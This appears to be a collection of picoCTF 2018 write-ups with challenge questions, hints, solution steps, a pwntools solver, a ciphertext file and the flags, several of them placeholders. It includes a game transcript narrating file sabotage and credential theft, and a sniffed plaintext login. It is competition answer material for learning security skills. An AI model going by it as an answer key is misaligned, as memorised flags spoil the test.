ujoo cx gmzcjxo. mqcx fxjrm jlq-bxkxr cgbs zqd oqbl yrxugmxof-zjkgbl ogwwox qr bq cqbxf gb cf yvrmx, jbs bqwzgbl yjrwguvojr wq gbwxrxmw cx qb mzqrx, g wzqvlzw g dqvos mjgo jtqvw j ogwwox jbs mxx wzx djwxrf yjrw qp wzx dqros. gw gm j djf g zjkx qp srgkgbl qpp wzx myoxxb jbs rxlvojwgbl wzx ugruvojwgqb. dzxbxkxr g pgbs cfmxop lrqdgbl lrgc jtqvw wzx cqvwz; dzxbxkxr gw gm j sjcy, srgaaof bqkxctxr gb cf mqvo; dzxbxkxr g pgbs cfmxop gbkqovbwjrgof yjvmgbl txpqrx uqppgb djrxzqvmxm, jbs trgblgbl vy wzx rxjr qp xkxrf pvbxrjo g cxxw; jbs xmyxugjoof dzxbxkxr cf zfyqm lxw mvuz jb vyyxr zjbs qp cx, wzjw gw rxhvgrxm j mwrqbl cqrjo yrgbugyox wq yrxkxbw cx prqc sxogtxrjwxof mwxyygbl gbwq wzx mwrxxw, jbs cxwzqsgujoof ebquegbl yxqyox'm zjwm qpp-wzxb, g juuqvbw gw zglz wgcx wq lxw wq mxj jm mqqb jm g ujb. wzgm gm cf mvtmwgwvwx pqr ygmwqo jbs tjoo. dgwz j yzgoqmqyzgujo poqvrgmz ujwq wzrqdm zgcmxop vyqb zgm mdqrs; g hvgxwof wjex wq wzx mzgy. wzxrx gm bqwzgbl mvryrgmgbl gb wzgm. gp wzxf tvw ebxd gw, jocqmw joo cxb gb wzxgr sxlrxx, mqcx wgcx qr qwzxr, uzxrgmz kxrf bxjrof wzx mjcx pxxogblm wqdjrsm wzx quxjb dgwz cx.
wzxrx bqd gm fqvr gbmvojr ugwf qp wzx cjbzjwwqxm, txowxs rqvbs tf dzjrkxm jm gbsgjb gmoxm tf uqrjo rxxpm-uqccxrux mvrrqvbsm gw dgwz zxr mvrp. rglzw jbs oxpw, wzx mwrxxwm wjex fqv djwxrdjrs. gwm xiwrxcx sqdbwqdb gm wzx tjwwxrf, dzxrx wzjw bqtox cqox gm djmzxs tf djkxm, jbs uqqoxs tf trxxaxm, dzguz j pxd zqvrm yrxkgqvm dxrx qvw qp mglzw qp ojbs. oqqe jw wzx urqdsm qp djwxr-ljaxrm wzxrx.
ugruvcjctvojwx wzx ugwf qp j srxjcf mjttjwz jpwxrbqqb. lq prqc uqroxjrm zqqe wq uqxbwgxm mogy, jbs prqc wzxbux, tf dzgwxzjoo, bqrwzdjrs. dzjw sq fqv mxx?-yqmwxs ogex mgoxbw mxbwgbxom joo jrqvbs wzx wqdb, mwjbs wzqvmjbsm vyqb wzqvmjbsm qp cqrwjo cxb pgixs gb quxjb rxkxrgxm. mqcx oxjbgbl jljgbmw wzx mygoxm; mqcx mxjwxs vyqb wzx ygxr-zxjsm; mqcx oqqegbl qkxr wzx tvodjrem qp mzgym prqc uzgbj; mqcx zglz joqpw gb wzx rgllgbl, jm gp mwrgkgbl wq lxw j mwgoo txwwxr mxjdjrs yxxy. tvw wzxmx jrx joo ojbsmcxb; qp dxxe sjfm yxbw vy gb ojwz jbs yojmwxr-wgxs wq uqvbwxrm, bjgoxs wq txbuzxm, uogbuzxs wq sxmem. zqd wzxb gm wzgm? jrx wzx lrxxb pgxosm lqbx? dzjw sq wzxf zxrx?
tvw oqqe! zxrx uqcx cqrx urqdsm, yjugbl mwrjglzw pqr wzx djwxr, jbs mxxcgblof tqvbs pqr j sgkx. mwrjblx! bqwzgbl dgoo uqbwxbw wzxc tvw wzx xiwrxcxmw ogcgw qp wzx ojbs; oqgwxrgbl vbsxr wzx mzjsf oxx qp fqbsxr djrxzqvmxm dgoo bqw mvppgux. bq. wzxf cvmw lxw nvmw jm bglz wzx djwxr jm wzxf yqmmgtof ujb dgwzqvw pjoogbl gb. jbs wzxrx wzxf mwjbs-cgoxm qp wzxc-oxjlvxm. gbojbsxrm joo, wzxf uqcx prqc ojbxm jbs jooxfm, mwrxxwm jbs jkxbvxm-bqrwz, xjmw, mqvwz, jbs dxmw. fxw zxrx wzxf joo vbgwx. wxoo cx, sqxm wzx cjlbxwgu kgrwvx qp wzx bxxsoxm qp wzx uqcyjmmxm qp joo wzqmx mzgym jwwrjuw wzxc wzgwzxr?
================================================
FILE: Cryptography/hertz 2/README.md
================================================
# hertz 2
Points: 200
## Category
Cryptography
## Question
>This flag has been encrypted with some kind of cipher, can you decrypt it? Connect with `nc 2018shell1.picoctf.com 23479`.
### Hint
>These kinds of problems are solved with a frequency that merits some analysis.
## Solution
Another Substitution Cipher. Use an online tool to brute-force. Online tool: https://quipqiup.com/
Set _nkibILQ=picoCTF_ in _Clues_ input box.
### Flag
`picoCTF{substitution_ciphers_are_too_easy_vydbopybvn}`
================================================
FILE: Cryptography/hertz 2/solution/ciphertext
================================================
Let's decode this now!
Xcd fiejb phgor kgw qivsm gudh xcd ynza lgt. E jnr'x pdyedud xcem em mijc nr dnma shgpydv er Sejg. Ex'm nyvgmx nm ek E mgyudl n shgpydv nyhdnla! Gbna, kerd. Cdhd'm xcd kynt: sejgJXK{mipmxexixegr_jescdhm_nhd_xgg_dnma_ualpgsapur}
================================================
FILE: Cryptography/rsa-madlibs/README.md
================================================
# rsa-madlibs
Points: 250
## Category
Cryptography
## Question
>We ran into some weird puzzles we think may mean something, can you help me solve one? Connect with `nc 2018shell1.picoctf.com 40440`
### Hint
>[RSA info](https://simple.wikipedia.org/wiki/RSA_algorithm)
## Solution
Solve each individual question to get the flag.
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{d0_u_kn0w_th3_w@y_2_RS@_5d383e10}`
================================================
FILE: Cryptography/rsa-madlibs/solution/solve.py
================================================
from pwn import *
s = remote('2018shell1.picoctf.com', 40440)
s.sendline('Y\n8815769761')
print s.recv()
s.sendline('Y\n77773')
print s.recv()
s.sendline('N')
print s.recv()
s.sendline('Y\n6256003596')
print s.recv()
s.sendline('Y\n26722917505435451150596710555980625220524134812001687080485341361511207096550823814926607028717403343344600191255790864873639087129323153797404989216681535785492257030896045464472300400447688001563694767148451912130180323038978568872458130612657140514751874493071944456290959151981399532582347021031424096175747508579453024891862161356081561032045394147561900547733602483979861042957169820579569242714893461713308057915755735700329990893197650028440038700231719057433874201113850357283873424698585951160069976869223244147124759020366717935504226979456299659682165757462057188430539271285705680101066120475874786208053')
print s.recv()
s.sendline('N')
print s.recv()
s.sendline('Y\n1405046269503207469140791548403639533127416416214210694972085079171787580463776820425965898174272870486015739516125786182821637006600742140682552321645503743280670839819078749092730110549881891271317396450158021688253989767145578723458252769465545504142139663476747479225923933192421405464414574786272963741656223941750084051228611576708609346787101088759062724389874160693008783334605903142528824559223515203978707969795087506678894006628296743079886244349469131831225757926844843554897638786146036869572653204735650843186722732736888918789379054050122205253165705085538743651258400390580971043144644984654914856729')
print s.recv()
s.sendline('Y\n240109877286251840533272915662757983981706320845661471802585807564915966910384301849411666983334013')
print s.recv()
s.close()
print str(hex(240109877286251840533272915662757983981706320845661471802585807564915966910384301849411666983334013))[2:].decode('hex')
================================================
FILE: Forensics/Desrouleaux/README.md
================================================
# Desrouleaux
Points: 150
## Category
Forensics
## Question
>Our network administrator is having some trouble handling the tickets for all of of our incidents. Can you help him out by answering all the questions? Connect with `nc 2018shell1.picoctf.com 54782`. [incidents.json](files/incidents.json)
### Hint
>If you need to code, python has some good libraries for it.
## Solution
Answer the questions manually by reading the json file provided.
### Flag
`picoCTF{J4y_s0n_d3rUUUULo_c74e3495}`
================================================
FILE: Forensics/Desrouleaux/files/incidents.json
================================================
{
"tickets": [
{
"ticket_id": 0,
"timestamp": "2017/03/28 10:01:06",
"file_hash": "63bcd94fbe1e2c99",
"src_ip": "162.8.248.12",
"dst_ip": "187.187.82.237"
},
{
"ticket_id": 1,
"timestamp": "2017/09/04 15:31:42",
"file_hash": "63bcd94fbe1e2c99",
"src_ip": "162.8.248.12",
"dst_ip": "125.131.104.137"
},
{
"ticket_id": 2,
"timestamp": "2016/07/08 03:27:45",
"file_hash": "5d930a931dd84e8b",
"src_ip": "162.8.248.12",
"dst_ip": "82.83.105.13"
},
{
"ticket_id": 3,
"timestamp": "2015/06/29 08:31:31",
"file_hash": "e3b90623a0ca9745",
"src_ip": "223.209.63.210",
"dst_ip": "187.187.82.237"
},
{
"ticket_id": 4,
"timestamp": "2015/02/13 04:31:55",
"file_hash": "720096b2b2855d17",
"src_ip": "223.209.63.210",
"dst_ip": "125.131.104.137"
},
{
"ticket_id": 5,
"timestamp": "2017/11/09 01:26:22",
"file_hash": "e3b90623a0ca9745",
"src_ip": "162.8.248.12",
"dst_ip": "149.0.138.115"
},
{
"ticket_id": 6,
"timestamp": "2017/01/20 15:02:47",
"file_hash": "ac84dfa24377cb40",
"src_ip": "124.80.164.10",
"dst_ip": "149.235.167.177"
},
{
"ticket_id": 7,
"timestamp": "2015/02/15 15:26:18",
"file_hash": "347989286aebfcf2",
"src_ip": "124.80.164.10",
"dst_ip": "0.183.177.9"
},
{
"ticket_id": 8,
"timestamp": "2015/08/11 07:48:40",
"file_hash": "e6cfc9c79e33de45",
"src_ip": "162.8.248.12",
"dst_ip": "237.219.198.133"
},
{
"ticket_id": 9,
"timestamp": "2016/05/18 05:22:45",
"file_hash": "5d930a931dd84e8b",
"src_ip": "55.36.143.123",
"dst_ip": "149.0.138.115"
}
]
}
================================================
FILE: Forensics/Ext Super Magic/README.md
================================================
# Ext Super Magic
Points: 250
## Category
Forensics
## Question
>We salvaged a ruined Ext SuperMagic II-class mech recently and pulled the [filesystem](files/ext-super-magic.img) out of the black box. It looks a bit corrupted, but maybe there's something interesting in there. You can also find it in /problems/ext-super-magic_4_f196e59a80c3fdac37cc2f331692ef13 on the shell server.
### Hint
>Are there any [tools](https://en.wikipedia.org/wiki/Fsck) for diagnosing corrupted filesystems? What do they say if you run them on this one?
>
>How does a linux machine know what [type](https://www.garykessler.net/library/file_sigs.html) of file a [file](https://linux.die.net/man/1/file) is?
>
>You might find this [doc](http://www.nongnu.org/ext2-doc/ext2.html) helpful.
>
>Be careful with [endianness](https://en.wikipedia.org/wiki/Endianness) when making edits.
>
>Once you've fixed the corruption, you can use /sbin/[debugfs](https://linux.die.net/man/8/debugfs) to pull the flag file out.
## Solution
To do.
### Flag
`picoCTF{a7DB29eCf7dB9960f0A19Fdde9d00Af0}`
================================================
FILE: Forensics/Forensics Warmup 1/README.md
================================================
# Forensics Warmup 1
Points: 50
## Category
Forensics
## Question
>Can you unzip this [file](files/flag.zip) for me and retreive the flag?
### Hint
>Make sure to submit the flag as picoCTF{XXXXX}
## Solution
Extract the zipped file provided by doing `unzip flag.zip`.
The extracted file contain _flag.jpg_. Open image in an image viewer to get the flag.
### Flag
`picoCTF{welcome_to_forensics}`
================================================
FILE: Forensics/Forensics Warmup 2/README.md
================================================
# Forensics Warmup 2
Points: 50
## Category
Forensics
## Question
>Hmm for some reason I can't open this [PNG](files/flag.png)? Any ideas?
### Hint
>How do operating systems know what kind of file it is? (It's not just the ending!
>
>Make sure to submit the flag as picoCTF{XXXXX}
## Solution
Do `file flag.png` to find the actual filetype.
However, most image viewer software should be able to open the _.png_ file without any problem.
If this doesn't work change the file extension to _.jpg_
### Flag
`picoCTF{extensions_are_a_lie}`
================================================
FILE: Forensics/LoadSomeBits/README.md
================================================
# LoadSomeBits
Points: 550
## Category
Forensics
## Question
>Can you find the flag encoded inside this [image](files/)? You can also find the file in /problems/loadsomebits_4_7be73021cd0c9c84b08937323b0d6ae1 on the shell server.
### Hint
>Look through the Least Significant Bits for the image
>
>If you interpret a binary sequence (seq) as ascii and then try interpreting the same binary sequence from an offset of 1 (seq[1:]) as ascii do you get something similar or completely different?
## Solution
To do.
### Flag
`flag`
================================================
FILE: Forensics/Lying Out/README.md
================================================
# Lying Out
Points: 250
## Category
Forensics
## Question
>Some odd [traffic](files/traffic.png) has been detected on the network, can you identify it? More info here. Connect with `nc 2018shell1.picoctf.com 50875` to help us answer some questions.
### Hint
No Hints.
## Solution
To do.
### Flag
`flag`
================================================
FILE: Forensics/Malware Shops/README.md
================================================
# Malware Shops
Points: 400
## Category
Forensics
## Question
>There has been some [malware](files/plot.png) detected, can you help with the analysis? More [info](files/info.txt) here. Connect with `nc 2018shell1.picoctf.com 18874`.
### Hint
No Hints.
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: Forensics/Malware Shops/files/info.txt
================================================
You've been given a dataset of about 500 malware binary files that have
been found on your organization's computers. Whenever you find more malware,
you want to be able to tell if you've seen a file like this before.
Binary files are hard to understand. When code is written, there are several
more steps before it becomes software. Some parts of this process are:
i. Compiling, which turns human-readable source code into assembly code.
Assembly code is difficult for humans to read, but it closely mimics the most
basic raw instructions that a computer needs in order to run a program.
ii. Assembling, which turns assembly code into machine code. Machine code is
impossible for humans to read, but this representation is what a computer
actually needs to execute.
The malware binary files that were given to you to analyze are all in machine
code, but luckily, you were able to run a program called a disassembler to
turn them back into assembly code.
Assembly code contains *instructions* which tell a computer how to update
its own internal memory, and its progress through reading the assembly code
itself. For instance, the `jmp` instruction means "jump to executing a
different instruction", and the `add` instruction means "add two numbers and
store the result in memory".
Your dataset contains data about all the malware files, including their
file hash, which serves as a name, and the counts of all of the `jmp` and `add`
instructions.
Malware attackers often release many slightly different versions of the same
malware over time. These different versions always have totally different
hashes, but they are likely to have similar numbers of `jmp` and `add`
instructions.
================================================
FILE: Forensics/Reading Between the Eyes/README.md
================================================
# Reading Between the Eyes
Points: 150
## Category
Forensics
## Question
>Stego-Saurus hid a message for you in this image, can you retreive it?
### Hint
>Maybe you can find an online decoder?
## Solution
install zsteg
```gem install zsteg```
run `zsteg husky.png`
```
b1,r,lsb,xy .. text: "^5>c[rvyzrf@"
b1,rgb,lsb,xy .. text: "picoCTF{r34d1ng_b37w33n_7h3_by73s}"
b1,abgr,msb,xy .. file: PGP\011Secret Sub-key -
b2,g,msb,xy .. text: "ADTU@PEPA"
b2,rgb,lsb,xy .. file: PGP\011Secret Sub-key -
b3,abgr,msb,xy .. text: "t@Wv!Wt\tGtA"
b4,r,msb,xy .. text: "0Tt7F3Saf"
b4,g,msb,xy .. text: "2g'uV `3"
b4,b,lsb,xy .. text: "##3\"TC%\"2f"
b4,b,msb,xy .. text: " uvb&b@f!"
b4,rgb,lsb,xy .. text: "1C5\"RdWD"
b4,rgb,msb,xy .. text: "T E2d##B#VuQ`"
b4,bgr,lsb,xy .. text: "A%2RTdGG"
b4,bgr,msb,xy .. text: "EPD%4\"c\"#CUVqa "
b4,rgba,lsb,xy .. text: "?5/%/d_tO"
b4,abgr,msb,xy .. text: "EO%O#/c/2/C_e_q"
```
### Flag
`picoCTF{r34d1ng_b37w33n_7h3_by73s}`
================================================
FILE: Forensics/Recovering From the Snap/README.md
================================================
# Recovering From the Snap
Points: 150
## Category
Forensics
## Question
>There used to be a bunch of [animals](files/animals.dd) here, what did Dr. Xernon do to them?
### Hint
>Some files have been deleted from the disk image, but are they really gone?.
## Solution
install photoRec [as per your OS and architecture]
```https://www.cgsecurity.org/wiki/TestDisk_Download```
run ```photoRec animals.dd```
<br>
It will recover 4 .JPG files
<br>
3 of them are animal photos and 4th one contains the flag.
<br>
### Flag
`picoCTF{th3_5n4p_happ3n3d}`
================================================
FILE: Forensics/Truly an Artist/README.md
================================================
# Truly an Artist
Points: 200
## Category
Forensics
## Question
>Can you help us find the flag in this [Meta-Material](files/2018.png)? You can also find the file in /problems/truly-an-artist_3_066d6319e350c1d579e5cf32e326ba02.
### Hint
>Try looking beyond the image.
>
>Who created this?
## Solution
To do.
### Flag
`flag`
================================================
FILE: Forensics/What's My Name?/README.md
================================================
# What's My Name?
Points: 250
## Category
Forensics
## Question
>Say my name, say [my name](files/myname.pcap).
### Hint
>If you visited a website at an IP address, how does it know the name of the domain?
## Solution
To Do.
### Flag
`flag`
================================================
FILE: Forensics/admin panel/README.md
================================================
# admin panel
Points: 150
## Category
Forensics
## Question
>We captured some [traffic](files/admin_panel.pcap) logging into the admin panel, can you find the password?
### Hint
>Tools like wireshark are pretty good for analyzing pcap files.
## Solution
open data.pcap in wireshark and look through the data by following the packets, on `tcp.stream 5` the plaintext password and username will be shown
```
POST /login HTTP/1.1
Host: 192.168.3.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.3.128/
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Connection: keep-alive
Upgrade-Insecure-Requests: 1
user=admin&password=picoCTF{n0ts3cur3_13597b43}
```
### Flag
`picoCTF{n0ts3cur3_13597b43}`
================================================
FILE: Forensics/core/README.md
================================================
# core
Points: 350
## Category
Forensics
## Question
>This [program](files/print) was about to print the flag when it died. Maybe the flag is still in this [core](files/core) file that it dumped? Also available at /problems/core_3_bbdfe8f633bce938028c1339013a4865 on the shell server.
### Hint
>What is a core file?
>
>You may find this [reference](http://darkdust.net/files/GDB%20Cheat%20Sheet.pdf) helpful.
>
>Try to figure out where the flag was read into memory using the disassembly and [strace](https://linux.die.net/man/1/strace).
>
>You should study the format options on the cheat sheet and use the examine (x) or print (p) commands. disas may also be useful.
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: Forensics/hex editor/README.md
================================================
# hex editor
Points: 150
## Category
Forensics
## Question
>This [cat](files/hex_editor.jpg) has a secret to teach you. You can also find the file in /problems/hex-editor_2_c1a99aee8d919f6e42697662d798f0ff on the shell server.
### Hint
>What is a hex editor?
>
>Maybe google knows.
>
>[xxd](http://linuxcommand.org/man_pages/xxd1.html)
>
>[hexedit](http://linuxcommand.org/man_pages/hexedit1.html)
>
>[bvi](http://manpages.ubuntu.com/manpages/natty/man1/bvi.1.html)
## Solution
To do.
### Flag
`flag`
================================================
FILE: Forensics/now you don't/README.md
================================================
# now you don't
Points: 200
## Category
Forensics
## Question
>We heard that there is something hidden in this [picture](files/nowYouDont.png). Can you find it?
### Hint
>There is an old saying: if you want to hide the treasure, put it in plain sight. Then no one will see it.
>
>Is it really all one shade of red?
## Solution
Download the image, put it into MS paint or image editor of your choice. Then, fill in the background with any non-red colour, to reveal the answer
### Flag
picoCTF{n0w_y0u_533_m3}
================================================
FILE: General Skills/Aca-Shell-A/README.md
================================================
# Aca-Shell-A
Points: 150
## Category
General Skills
## Question
>It's never a bad idea to brush up on those linux skills or even learn some new ones before you set off on this adventure! Connect with `nc 2018shell1.picoctf.com 33158`.
### Hint
>Linux for [Beginners](https://maker.pro/education/basic-linux-commands-for-beginners)
## Solution
This challenge teaches you the basic commands of Linux.
- `ls`
- `cd`
- `rm`
- How to execute files
- `whoami`
- `cat`
Follow the instructions and get the flag.
```
$ nc 2018shell1.picoctf.com 33158
Sweet! We have gotten access into the system but we aren't root.
It's some sort of restricted shell! I can't see what you are typing
but I can see your output. I'll be here to help you along.
If you need help, type "echo 'Help Me!'" and I'll see what I can do
There is not much time left!
~/$ ls
blackmail
executables
passwords
photos
secret
~/$ cd secret
Now we are cookin'! Take a look around there and tell me what you find!
~/secret$ ls
intel_1
intel_2
intel_3
intel_4
intel_5
profile_AipieG5Ua9aewei5ieSoh7aph
profile_Xei2uu5suwangohceedaifohs
profile_ahShaighaxahMooshuP1johgo
profile_ahqueith5aekongieP4ahzugi
profile_aik4hah9ilie9foru0Phoaph0
profile_bah9Ech9oa4xaicohphahfaiG
profile_ie7sheiP7su2At2ahw6iRikoe
profile_of0Nee4laith8odaeLachoonu
profile_poh9eij4Choophaweiwev6eev
profile_poo3ipohGohThi9Cohverai7e
Sabatoge them! Get rid of all their intel files!
~/secret$ rm intel*
Nice! Once they are all gone, I think I can drop you a file of an exploit!
Just type "echo 'Drop it in!' " and we can give it a whirl!
~/secret$ echo 'Drop it in!'
Drop it in!
I placed a file in the executables folder as it looks like the only place we can execute from!
Run the script I wrote to have a little more impact on the system!
~/secret$ cd ..
~/$ cd executables
~/executables$ ls
dontLookHere
~/executables$ ./dontLookHere
...
...
...
Looking through the text above, I think I have found the password. I am just having trouble with a username.
Oh drats! They are onto us! We could get kicked out soon!
Quick! Print the username to the screen so we can close are backdoor and log into the account directly!
You have to find another way other than echo!
~/executables$ whoami
l33th4x0r
Perfect! One second!
Okay, I think I have got what we are looking for. I just need to to copy the file to a place we can read.
Try copying the file called TopSecret in tmp directory into the passwords folder.
~/executables$ cp /tmp/TopSecret passwords
Server shutdown in 10 seconds...
Quick! go read the file before we lose our connection!
~/executables$ cd ..
~/$ ls
blackmail
executables
passwords
photos
secret
~/$ cd passwords
~/passwords$ ls
TopSecret
~/passwords$ cat TopSecret
Major General John M. Schofield's graduation address to the graduating class of 1879 at West Point is as follows: The discipline which makes the soldiers of a free country reliable in battle is not to be gained by harsh or tyrannical treatment.On the contrary, such treatment is far more likely to destroy than to make an army.It is possible to impart instruction and give commands in such a manner and such a tone of voice as to inspire in the soldier no feeling butan intense desire to obey, while the opposite manner and tone of voice cannot fail to excite strong resentment and a desire to disobey.The one mode or other of dealing with subordinates springs from a corresponding spirit in the breast of the commander.He who feels the respect which is due to others, cannot fail to inspire in them respect for himself, while he who feels,and hence manifests disrespect towards others, especially his subordinates, cannot fail to inspire hatred against himself.
picoCTF{CrUsHeD_It_9edaa84a}
```
### Flag
`picoCTF{CrUsHeD_It_9edaa84a}`
================================================
FILE: General Skills/Dog or Frog/README.md
================================================
# Dog or Frog
Points: 400
## Category
General Skills
## Question
>Dressing up dogs are kinda the new thing, see if you can get this lovely girl ready for her costume party. [Dog Or Frog](http://2018shell1.picoctf.com:5467/)
### Hint
>This really is a ML problem, read the hints in the problem for more details..
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: General Skills/General Warmup 1/README.md
================================================
# General Warmup 1
Points: 50
## Category
General Skills
## Question
>If I told you your grade was 0x41 in hexadecimal, what would it be in ASCII?
### Hint
>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{hello}' as the flag.
## Solution
We can use Python to get the ASCII value of _0x41_.
```python
>>> chr(0x41)
'A'
```
### Flag
`picoCTF{A}`
================================================
FILE: General Skills/General Warmup 2/README.md
================================================
# General Warmup 2
Points: 50
## Category
General Skills
## Question
>Can you convert the number 27 (base 10) to binary (base 2)?
### Hint
>Submit your answer in our competition's flag format. For example, if you answer was '11111', you would submit 'picoCTF{11111}' as the flag.
## Solution
We can use Python to convert an integer to a binary number.
```python
>>> bin(27)[2:]
'11011'
```
### Flag
`picoCTF{11011}`
================================================
FILE: General Skills/General Warmup 3/README.md
================================================
# General Warmup 3
Points: 50
## Category
General Skills
## Question
>What is 0x3D (base 16) in decimal (base 10).
### Hint
>Submit your answer in our competition's flag format. For example, if you answer was '22', you would submit 'picoCTF{22}' as the flag.
## Solution
We can use Python to convert hexadecimal to decimal numbers.
```python
>>> 0x3d
61
```
### Flag
`picoCTF{61}`
================================================
FILE: General Skills/Resources/README.md
================================================
# Resources
Points: 50
## Category
General Skills
## Question
>We put together a bunch of resources to help you out on our website! If you go over there, you might even find a flag! https://picoctf.com/resources ([link](https://picoctf.com/resources))
### Hint
No hints available
## Solution
Go to the link, scroll down and you can find the flag.
### Flag
`picoCTF{xiexie_ni_lai_zheli}`
================================================
FILE: General Skills/Resources/solution/source/resources
================================================
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="picoCTF is a free computer security game for middle and high school students.">
<meta name="designer" content="Jason Petz - https://petzdes.com">
<meta property="og:title" content="picoCTF - CMU Cybersecurity Competition - Resources">
<meta property="og:description" content="picoCTF is a free computer security game for middle and high school students.">
<meta property="og:type" content="website">
<meta property="og:url" content="/resources.html">
<meta property="og:image" content="https://picoctf.com/img/picoctf_og.png">
<title>picoCTF - CMU Cybersecurity Competition - Resources</title>
<link href="https://fonts.googleapis.com/css?family=Roboto:300,400,700,900" rel="stylesheet">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="/css/font-awesome.min.css">
<link rel="apple-touch-icon" sizes="57x57" href="/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-93258343-2"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-93258343-2');
</script>
</head>
<body>
<div class="w-100" id="top-container">
<div class="container">
<nav class="navbar navbar-expand-md navbar-light">
<a class="navbar-brand ml-lg-4" href="/"><img src="/img/logos/picoctf_logo.png"></a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav ml-auto mr-1">
<li class="nav-item ">
<a class="nav-link" href="/get_started">GET STARTED </a>
</li>
<li class="nav-item ">
<a class="nav-link" href="/about">ABOUT </a>
</li>
<li class="nav-item ">
<a class="nav-link" href="/rules">RULES </a>
</li>
<li class="nav-item ">
<a class="nav-link" href="/teachers">TEACHERS </a>
</li>
<li class="nav-item ">
<a class="nav-link" href="/sponsors">SPONSOR </a>
</li>
<li class="nav-item active">
<a class="nav-link" href="/resources">RESOURCES </a>
</li>
</ul>
</div>
</nav>
</div>
</div>
<div class="container" id="top-graybar">
</div>
<div id="main-content" class="container pt-45 pb-45">
<div class="row px-45">
<div class="col-12">
<h1 id="resources"><img src="img/flag-2.png" alt="flag" />Resources</h1>
<p><em>Check back for updates to this section in the coming weeks!</em></p>
<h3 id="read-our-guide-to-getting-started">Read our <a href="/get_started">guide to getting started</a>.</h3>
<hr />
<h2 id="learning-guides">Learning Guides</h2>
<p>Check out these learning guides that provide basic background information to help you get started solving problems:</p>
<ul>
<li><a href="/learning_guides/Book-1-General-Skills.pdf" target="_blank">General Skills</a></li>
<li><a href="/learning_guides/Book-2-Cryptography.pdf" target="_blank">Cryptography</a></li>
<li><a href="/learning_guides/Book-3-Web-Exploitation.pdf" target="_blank">Web Exploitation</a></li>
<li><a href="/learning_guides/Book-4-Forensics.pdf" target="_blank">Forensics</a></li>
<li><a href="/learning_guides/Book-5-Binary-Exploitation.pdf" target="_blank">Binary Exploitation</a></li>
<li><a href="/learning_guides/Book-6-Reversing.pdf" target="_blank">Reversing</a></li>
</ul>
<p>This <a href="Pico-CTF-2018-Educational-Outcomes.pdf">document</a> outlines the learning objectives for the competition.</p>
<hr />
<h2 id="pico2017-video-tutorials">pico2017 Video Tutorials</h2>
<p>Check out video tutorials for the 2017 picoCTF competition problems on our <a href="https://www.youtube.com/user/carlislemc/featured">featured YouTube channel</a>.</p>
<div class="row">
<div class="col-md-8 offset-md-2">
<div class="embed-responsive embed-responsive-16by9">
<iframe class="embed-responsive-item" src="https://www.youtube.com/embed/videoseries?list=PLJ_vkrXdcgH-lYlRV8O-kef2zWvoy79yP" allowfullscreen=""></iframe>
</div>
</div>
</div>
<p><br />
<br />
Thanks for reading the resources page! Here’s a flag for your time: picoCTF{xiexie_ni_lai_zheli}</p>
<hr />
<h2 id="piazza">Piazza</h2>
<p>If you need some more help, please reach out to us on Piazza using this <a href="https://piazza.com/picoctf/fall2018/31337" target="_blank">link</a>. The access code is ‘31337’.</p>
</div>
</div>
</div>
<footer id="footer" class="">
<div class="container pb-5 pb-md-1 text-md-left text-center" id="standard-footer">
<div class="row">
<div class="col-md-6 pt-4 pl-5" id="footer-left">
<!--<h6>DIAMOND SPONSOR</h6>
<img src="/img/sponsor/placeholder.png">-->
</div>
<div class="col-md-6 pt-4" id="footer-right">
<div>
<a href="https://cmu.edu" target="_blank"><img height="32" width="51" src="/img/logos/cmu.png"></a>
<a href="https://ini.cmu.edu" target="_blank"><img height="32" width="204" src="/img/logos/ini.png"></a>
<a href="https://cylab.cmu.edu" target="_blank"><img height="32" width="75" src="/img/logos/cylab.png"></a>
<img height="32" width"32" src="/img/logos/ppp.png">
</div>
<div>
<a href="https://facebook.com/picoctf.competition" target="_blank"><img src="/img/logos/facebook.png"></a>
<a href="https://twitter.com/picoctf" target="_blank"><img src="/img/logos/twitter.png"></a>
<h5 class="ml-3 mr-auto d-inline-block text-left align-top">© Carnegie Mellon University 2018<br/>
Use of this site is governed by the <a href="/privacy">Privacy Statement</a> and <a href="/terms">Terms
of Service</a>.<br/>
</h5>
</div>
</div>
</div>
</div>
<div class="d-md-none" id="footer-lines"></div>
</footer> <!-- footer -->
